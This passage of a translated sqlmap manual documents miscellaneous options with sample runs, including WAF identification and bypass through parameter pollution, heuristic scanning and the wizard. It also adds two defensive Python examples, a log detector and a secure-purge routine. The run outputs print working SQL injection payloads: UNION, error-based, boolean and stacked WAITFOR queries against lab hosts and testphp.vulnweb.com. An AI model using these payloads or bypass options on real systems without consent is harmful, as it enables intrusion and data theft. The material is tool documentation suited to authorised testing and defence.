Miscellaneous

Translated from: Miscellaneous

Use short mnemonics

Option: -z

Typing all the desired options and switches is tedious, especially for the ones used most often (e.g. --batch --random-agent --ignore-proxy --technique=BEU). There is a simpler and much shorter way of dealing with this problem. In sqlmap it is called "mnemonics".

With option -z, each option and switch can be written in a shorter mnemonic form, separated by commas (,), where each mnemonic is an arbitrarily chosen prefix of the original name. Options and switches are not strictly mapped to any fixed shortened form. The only requirement is that no other option or switch shares the same prefix.

For example:

    $ python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

can be written in short mnemonic form (one of many ways) as:

    $ python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

Another example:

    $ python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

can be written in short mnemonic form as:

    $ python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

Alert on successful SQL injection detection

Option: --alert

Set answers to questions

Option: --answers

If a user wants to automatically answer questions, even when using the --batch option, he can do so by providing any part of the question text followed by an equals sign and the answer. Answers to different questions are separated by the delimiter ",".

Example against a MySQL target:

    $ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch
    [...]
    [xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    [xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
    [...]

Make a beep sound when SQL injection is found

Switch: --beep

If the user uses switch --beep, sqlmap will make an immediate audible "beep" warning when SQL injection is found. This is especially useful when there is a large bulk list of target URLs (option -m) to test.

Clean up the DBMS (Database Management System) from sqlmap-specific UDF(s) and tables

Switch: --cleanup

It is recommended to clean up the back-end DBMS from sqlmap temporary table(s) (e.g. sqlmapoutput) and created user-defined function(s) once you are done with the takeover of the underlying operating system or file system. Switch --cleanup will clean up the DBMS and file system wherever possible.

Check dependencies

Switch: --dependencies

In some special cases sqlmap requires independent installation of extra third-party libraries (e.g. option -d, switch --os-pwn in case of icmpsh tunneling, option --auth-type in case of NTLM HTTP authentication, etc.), and it will warn the user only in such special cases. If you want to independently check for all those extra third-party library dependencies, you can use switch --dependencies:

    $ python sqlmap.py --dependencies
    [...]
    [xx:xx:28] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in order to directly connect to the DBMS Firebird. Download from http://kinterbasdb.sourceforge.net/
    [xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS Sybase. Download from http://pymssql.sourceforge.net/
    [xx:xx:28] [WARNING] sqlmap requires 'python pymysql' third-party library in order to directly connect to the DBMS MySQL. Download from https://github.com/petehunt/PyMySQL/
    [xx:xx:28] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in order to directly connect to the DBMS Oracle. Download from http://cx-oracle.sourceforge.net/
    [xx:xx:28] [WARNING] sqlmap requires 'python-psycopg2' third-party library in order to directly connect to the DBMS PostgreSQL. Download from http://initd.org/psycopg/
    [xx:xx:28] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS IBM DB2. Download from http://code.google.com/p/ibm-db/
    [xx:xx:28] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-party library in order to directly connect to the DBMS HSQLDB. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
    [xx:xx:28] [WARNING] sqlmap requires 'python-pyodbc' third-party library in order to directly connect to the DBMS Microsoft Access. Download from http://pyodbc.googlecode.com/
    [xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS Microsoft SQL Server. Download from http://pymssql.sourceforge.net/
    [xx:xx:28] [WARNING] sqlmap requires 'python-ntlm' third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/
    [xx:xx:28] [WARNING] sqlmap requires 'websocket-client' third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/

Disable console output coloring

Switch: --disable-coloring

By default, sqlmap uses coloring when writing to the console. You can disable console output coloring with this switch to avoid undesired effects (e.g. unparsed ANSI color codes in the console, such as \x01\x1b[0;32m\x02[INFO]).

Use Google dork results from a specified page number

Option: --gpage

By default, with option -g, sqlmap uses the first 100 URLs returned by the Google search for further SQL injection testing. Combined with that option, you can use --gpage to specify a page other than the first one from which to retrieve target URLs.

Use HTTP parameter pollution

Switch: --hpp

HTTP parameter pollution (HPP) is a method of bypassing WAF/IPS protection mechanisms (explained here) that is particularly effective against ASP/IIS and ASP.NET/IIS platforms. If you suspect that the target is behind such protection, you can try to bypass it with this switch.

Make a thorough test for WAF/IPS protection

Switch: --identify-waf

sqlmap can try to identify back-end WAF/IPS protection (if any) so that the user can take the appropriate steps (e.g. use tamper scripts with option --tamper). Currently around 30 different products are supported (e.g. Airlock, Barracuda WAF, etc.), and their respective WAF scripts can be found in the waf directory.

Example against a MySQL target protected by ModSecurity WAF:

    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
    [...]
    [xx:xx:23] [INFO] testing connection to the target URL
    [xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
    [xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS protection
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'USP Secure Entry Server (United Security Providers)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'TrafficShield (F5 Networks)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'KONA Security Solutions (Akamai Technologies)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'webApp.secure (webScurity)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Proventia Web Application Security (IBM)'
    [xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
    [xx:xx:23] [DEBUG] page not found (404)
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'KS-WAF (Knownsec)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'NetScaler (Citrix Systems)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Jiasule Web Application Firewall (Jiasule)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'WebKnight Application Firewall (AQTRONIX)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'AppWall (Radware)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
    [xx:xx:23] [CRITICAL] WAF/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
    [...]

Skip heuristic detection of WAF/IPS protection

Switch: --skip-waf

By default, sqlmap automatically sends, inside one of the starting requests, a dummy parameter value containing a deliberately "suspicious" SQL injection payload (e.g. ...&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1). If the target responds differently than it did to the original request, there is a high chance that it is under some kind of protection. In case of any problems, the user can disable this mechanism with switch --skip-waf.
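Both of the mechanisms just described leave a distinctive shape in a web server's access log: the --hpp switch produces requests in which the same parameter name occurs more than once, and the WAF-detection probe produces a parameter the application never defined whose value carries the UNION ALL SELECT ... information_schema fragment quoted above. The following detector, an added example that is not part of sqlmap or of this manual, reads Common Log Format lines and reports both. The three log lines, the /vuln.php path and its KNOWN_PARAMS entry are constructed for the example, and the probe signature is an assumption keyed on the payload shape quoted in the text.

```python
"""Flag HTTP parameter pollution and sqlmap's WAF-detection probe in access
logs (added example for defenders; not sqlmap's own code)."""
import re
from urllib.parse import urlsplit, parse_qsl

# Common Log Format line: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Assumption: the probe is recognised by the UNION ALL SELECT ... information_schema
# shape quoted in the text above; tune the pattern to your own traffic.
PROBE_RE = re.compile(r"\bUNION\s+ALL\s+SELECT\b.*\binformation_schema\b", re.I)

# Parameters each endpoint legitimately accepts (constructed for the example);
# a parameter missing from this set is the "dummy" one the probe rides on.
KNOWN_PARAMS = {"/vuln.php": {"id"}}

# Constructed sample log: a normal request, the probe, and a polluted request.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /vuln.php?id=1&foobar=AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1 HTTP/1.1" 403 213
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /vuln.php?id=1&id=2 HTTP/1.1" 200 512
"""


def parse_request(line):
    """Return (ip, path, [(name, value), ...]) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl keeps every occurrence of a name, which is what HPP detection needs
    params = parse_qsl(parts.query, keep_blank_values=True)
    return m.group("ip"), parts.path, params


def find_hpp(params):
    """Parameter names that occur more than once in a single request."""
    seen, dupes = set(), []
    for name, _ in params:
        if name in seen and name not in dupes:
            dupes.append(name)
        seen.add(name)
    return dupes


def find_probe(path, params):
    """Unknown parameters whose decoded value matches the probe signature."""
    known = KNOWN_PARAMS.get(path, set())
    return [n for n, v in params if n not in known and PROBE_RE.search(v)]


def analyse(log_text):
    """Run both checks over every line; returns one finding dict per hit."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_request(line)
        if parsed is None:
            continue
        ip, path, params = parsed
        for name in find_hpp(params):
            findings.append({"ip": ip, "kind": "hpp", "param": name})
        for name in find_probe(path, params):
            findings.append({"ip": ip, "kind": "waf-probe", "param": name})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print("%(ip)s %(kind)s param=%(param)s" % f)
```

Run against SAMPLE_LOG this yields one waf-probe finding for foobar and one hpp finding for id. The probe detector deliberately requires the parameter to be absent from KNOWN_PARAMS: that is the property that distinguishes sqlmap's dummy-parameter probe from an injection attempt against a real parameter, and it is also why the check needs an inventory of what each endpoint accepts.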

Imitate a smartphone

Switch: --mobile

Sometimes web servers expose different interfaces to mobile phones than to desktop computers. In such cases you can enforce the use of one of the predetermined smartphone HTTP User-Agent header values. With this switch, sqlmap will ask you to select one of the popular smartphones, which it will imitate in the current run.

Example run:

    $ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
    [...]
    which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
    [1] Apple iPhone 4s (default)
    [2] BlackBerry 9900
    [3] Google Nexus 7
    [4] HP iPAQ 6365
    [5] HTC Sensation
    [6] Nokia N97
    [7] Samsung Galaxy S
    > 1
    [...]

Work in offline mode (only use session data)

Switch: --offline

With switch --offline, sqlmap will use only the data from the previous session for data enumeration. This basically means that there will be zero connection attempts during such a run.

Safely remove all content from the data directory

Switch: --purge


If the user decides to safely remove all content of the sqlmap data directory (e.g. $HOME/.sqlmap), containing all target details from previous sqlmap runs, he can use switch --purge. While purging, all files in the data directory and its subdirectories are overwritten with random data, truncated and renamed to random names; the (sub)directories are renamed to random names too; and finally the whole directory tree is deleted.

Example run:

    $ python sqlmap.py --purge -v 3
    [...]
    [xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap'...
    [xx:xx:55] [DEBUG] changing file attributes
    [xx:xx:55] [DEBUG] writing random data to files
    [xx:xx:55] [DEBUG] truncating files
    [xx:xx:55] [DEBUG] renaming filenames to random values
    [xx:xx:55] [DEBUG] renaming directory names to random values
    [xx:xx:55] [DEBUG] deleting the whole directory tree
    [...]
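The purge sequence shown in that debug output (change attributes, overwrite with random data, truncate, rename files, rename directories, delete the tree) is a general secure-deletion procedure for a tree of sensitive artefacts, and the following function carries it out on any directory. It is an added example, not sqlmap's own implementation; purge_demo builds a constructed sample tree in a temporary directory so the code can be run without touching a real data directory. Symbolic links are unlinked rather than followed, a check sqlmap's log does not mention but which keeps a stray link from causing data outside the tree to be overwritten.

```python
"""Secure purge of a directory tree: overwrite, truncate, rename, delete
(added example modelled on the steps in the log above; not sqlmap's code)."""
import os
import secrets
import shutil
import stat
import tempfile

CHUNK = 1 << 20  # overwrite in 1 MiB chunks so large files are not read into memory


def _random_name():
    return secrets.token_hex(8)


def scramble_file(path):
    """Overwrite a regular file with random bytes, truncate it, rename it.

    Returns the new path, or None when the entry was a symlink (which is
    unlinked, never followed, so nothing outside the tree gets overwritten)."""
    if os.path.islink(path):
        os.unlink(path)
        return None
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)     # "changing file attributes"
    remaining = os.path.getsize(path)
    with open(path, "r+b") as fh:                    # "writing random data to files"
        while remaining > 0:
            n = min(CHUNK, remaining)
            fh.write(secrets.token_bytes(n))
            remaining -= n
        fh.flush()
        os.fsync(fh.fileno())                        # push the random data to disk
        fh.truncate(0)                               # "truncating files"
    new_path = os.path.join(os.path.dirname(path), _random_name())
    os.rename(path, new_path)                        # "renaming filenames to random values"
    return new_path


def purge_directory(root):
    """Scramble every file and subdirectory under root, then delete the tree.

    Returns True when root no longer exists afterwards."""
    root = os.path.abspath(root)
    if os.path.islink(root) or not os.path.isdir(root):
        raise ValueError("refusing to purge %r: not a real directory" % root)
    # bottom-up walk: a directory's contents are scrambled before it is renamed
    for dirpath, dirnames, filenames in os.walk(root, topdown=False):
        for fname in filenames:
            scramble_file(os.path.join(dirpath, fname))
        for dname in dirnames:                       # "renaming directory names to random values"
            dpath = os.path.join(dirpath, dname)
            if os.path.islink(dpath):
                os.unlink(dpath)
            else:
                os.rename(dpath, os.path.join(dirpath, _random_name()))
    shutil.rmtree(root)                              # "deleting the whole directory tree"
    return not os.path.exists(root)


def purge_demo():
    """Build a constructed sample tree in a temp dir and purge it.

    Returns (files_created, purged_ok) so the result can be checked."""
    root = tempfile.mkdtemp(prefix="purge-demo-")
    os.makedirs(os.path.join(root, "output", "www.target.com"))
    sample = {                                       # constructed contents, not real session data
        os.path.join(root, "output", "www.target.com", "log"): b"session log\n" * 100,
        os.path.join(root, "output", "www.target.com", "session.sqlite"): os.urandom(4096),
        os.path.join(root, "empty.txt"): b"",
    }
    for path, data in sample.items():
        with open(path, "wb") as fh:
            fh.write(data)
    return len(sample), purge_directory(root)


if __name__ == "__main__":
    print("created %d files, purged: %s" % purge_demo())
```

One caveat a practitioner should keep in mind: overwriting in place only destroys the original blocks on media that rewrite in place. On SSDs with wear levelling, and on copy-on-write or journaling filesystems, the old contents may survive in blocks the overwrite never touched, so a purge of this kind reduces exposure but is not a substitute for full-disk encryption of the data directory's volume.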

Conduct thorough tests only if positive heuristic(s)

Switch: --smart

There are cases where a user has a large list of potential target URLs (e.g. provided with option -m) and wants to find a vulnerable target as fast as possible. If switch --smart is used, only parameters that provoke a DBMS error are used in further scans; the others are skipped.

Example against a MySQL target:

    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
    [...]
    [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
    [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
    [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
    [xx:xx:14] [INFO] skipping GET parameter 'ca'
    [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
    [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
    [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
    [xx:xx:14] [INFO] skipping GET parameter 'user'
    [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
    [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
    [xx:xx:14] [INFO] GET parameter 'id' is dynamic
    [xx:xx:14] [WARNING] reflective value(s) found and filtering out
    [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
    [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
    [xx:xx:14] [INFO] testing 'MySQL inline queries'
    [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
    [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
    [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [xx:xx:24] [INFO] target URL appears to have 3 columns in query
    [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
    [...]

Select (or skip) tests by payloads and/or titles

Option: --test-filter

If you want to filter tests by their payloads and/or titles, you can use this option. For example, to test only payloads containing the ROW keyword, you can use --test-filter=ROW.

Example against a MySQL target:

    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW
    [...]
    [xx:xx:39] [INFO] GET parameter 'id' is dynamic
    [xx:xx:39] [WARNING] reflective value(s) found and filtering out
    [xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    [xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
    [xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
    [xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause' injectable
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: error-based
        Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
        Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
    ---
    [...]

Option: --test-skip=TEST

If you want to skip tests by their payloads and/or titles, you can use this option. For example, to skip payloads containing the BENCHMARK keyword, you can use --test-skip=BENCHMARK.

Interactive sqlmap shell

Switch: --sqlmap-shell

With switch --sqlmap-shell, the user is presented with an interactive sqlmap shell that keeps a history of all previous runs, including the options and/or switches used:

    $ python sqlmap.py --sqlmap-shell
    sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=BEU --batch
    _
    ___ ___| |_____ ___ ___ {1.0-dev-2188502}
    |_ -| . | | | .'| . |
    |___|_ |_|_|_|_|__,| _|
    |_| |_| http://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting at xx:xx:11
    [xx:xx:11] [INFO] testing connection to the target URL
    [xx:xx:12] [INFO] testing if the target URL is stable
    [xx:xx:13] [INFO] target URL is stable
    [xx:xx:13] [INFO] testing if GET parameter 'artist' is dynamic
    [xx:xx:13] [INFO] confirming that GET parameter 'artist' is dynamic
    [xx:xx:13] [INFO] GET parameter 'artist' is dynamic
    [xx:xx:13] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL')
    [xx:xx:13] [INFO] testing for SQL injection on GET parameter 'artist'
    it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
    [xx:xx:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [xx:xx:13] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [xx:xx:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [xx:xx:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [xx:xx:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [xx:xx:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
    [xx:xx:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [xx:xx:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
    [xx:xx:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [xx:xx:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
    [xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
    [xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
    [xx:xx:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [xx:xx:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [xx:xx:15] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [xx:xx:15] [INFO] target URL appears to have 3 columns in query
    [xx:xx:16] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
    GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection point(s) with a total of 39 HTTP(s) requests:
    ---
    Parameter: artist (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: artist=1 AND 5707=5707

        Type: UNION query
        Title: Generic UNION query (NULL) - 3 columns
        Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a747376426d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),NULL,NULL-- -
    ---
    [xx:xx:16] [INFO] testing MySQL
    [xx:xx:16] [INFO] confirming MySQL
    [xx:xx:16] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS: MySQL >= 5.0.0
    [xx:xx:16] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/testphp.vulnweb.com'
    sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner
    _
    ___ ___| |_____ ___ ___ {1.0-dev-2188502}
    |_ -| . | | | .'| . |
    |___|_ |_|_|_|_|__,| _|
    |_| |_| http://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting at xx:xx:25
    [xx:xx:26] [INFO] resuming back-end DBMS 'mysql'
    [xx:xx:26] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: artist (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: artist=1 AND 5707=5707

        Type: UNION query
        Title: Generic UNION query (NULL) - 3 columns
        Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a747376426d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),NULL,NULL-- -
    ---
    [xx:xx:26] [INFO] the back-end DBMS is MySQL
    [xx:xx:26] [INFO] fetching banner
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS operating system: Linux Ubuntu
    back-end DBMS: MySQL 5
    banner: '5.1.73-0ubuntu0.10.04.1'
    [xx:xx:26] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/testphp.vulnweb.com'
    sqlmap-shell> exit

Simple wizard interface for beginner users

Switch: --wizard

sqlmap provides a wizard interface for beginner users, with a simple workflow that asks as few questions as possible. If the user enters only the target URL and accepts the default answers (e.g. by pressing Enter), the sqlmap run should be properly set up by the end of the workflow.

Example against a Microsoft SQL Server target:

    $ python sqlmap.py --wizard
    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
    http://sqlmap.org
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    [*] starting at xx:xx:26
    Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
    POST data (--data) [Enter for None]:
    Injection difficulty (--level/--risk). Please choose:
    [1] Normal (default)
    [2] Medium
    [3] Hard
    > 1
    Enumeration (--banner/--current-user/etc). Please choose:
    [1] Basic (default)
    [2] Smart
    [3] All
    > 1
    sqlmap is running, please wait..
    heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 2986=2986

        Type: error-based
        Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
        Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))

        Type: UNION query
        Title: Generic UNION query (NULL) - 3 columns
        Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)--

        Type: stacked queries
        Title: Microsoft SQL Server/Sybase stacked queries
        Payload: id=1; WAITFOR DELAY '0:0:5'--

        Type: AND/OR time-based blind
        Title: Microsoft SQL Server/Sybase time-based blind
        Payload: id=1 WAITFOR DELAY '0:0:5'--

        Type: inline query
        Title: Microsoft SQL Server/Sybase inline queries
